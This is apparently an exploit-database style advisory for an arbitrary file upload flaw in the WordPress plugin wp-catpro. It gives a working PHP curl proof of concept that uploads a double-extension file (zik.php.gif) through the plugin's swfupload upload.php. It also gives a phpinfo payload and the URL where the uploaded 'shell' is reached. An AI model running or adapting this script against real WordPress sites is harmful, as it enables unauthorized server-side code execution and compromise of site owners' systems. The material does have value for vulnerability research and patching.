WordPress plugin wp-catpro — Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif — the plugin's upload.php evidently validates only the final extension against the allow-list below, so a double-extension name passes. Whether the stored file is then executed as PHP depends on the target web server's handler configuration (e.g. Apache AddHandler matching any ".php" segment of the name); verify this on the target before relying on it.
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
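<?php
// PoC: push a double-extension file through the wp-catpro swfupload handler.
// Per the advisory, upload.php only checks the final extension against
// ("jpg", "gif", "png"), so "zik.php.gif" is accepted. Whether the stored
// file is later executed as PHP depends on the target's handler configuration
// (e.g. Apache AddHandler matching any ".php" segment) — confirm on the target.
//
// Usage: place zik.php.gif next to this script, set $base, run with php-cli.

$base       = 'http://[ www.xxx.com ]/[path]';   // site + WordPress install path
$uploadfile = 'zik.php.gif';                     // local file to upload
$folder     = '/wp-content/uploads/catpro/';     // destination sent to upload.php (the handler appears to take it from the client)

// Fail early instead of sending an empty multipart part.
if (!is_readable($uploadfile)) {
    fwrite(STDERR, "cannot read {$uploadfile}\n");
    exit(1);
}

$ch = curl_init($base . '/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php');
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the old "@file" string form: with CURLOPT_SAFE_UPLOAD
// (default since PHP 5.6, mandatory since 7.0) the "@" prefix is sent as a
// literal string and nothing is uploaded. The field name "Filedata" is the
// part swfupload's upload.php reads.
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'Filedata' => new CURLFile($uploadfile),
    'folder'   => $folder,
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$postResult = curl_exec($ch);
// curl_exec() returns false on a transport error; the original printed it blindly.
if ($postResult === false) {
    fwrite(STDERR, 'request failed: ' . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
curl_close($ch);

print $postResult;

// upload.php stores the file under a random name (the response printed above
// presumably reports it). Shell access, if the server executes .php.gif as PHP:
//   http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>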
<?php
// Contents of the uploaded payload (zik.php.gif): dump the PHP configuration
// to prove the file is executed server-side. INFO_ALL is phpinfo()'s default.
phpinfo(INFO_ALL);
?>